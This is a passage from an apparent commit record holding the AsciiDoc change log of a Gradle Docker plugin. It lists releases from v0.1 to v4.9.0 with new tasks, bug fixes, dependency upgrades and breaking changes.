{uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v4.9.0 (TBA)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not inject into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* 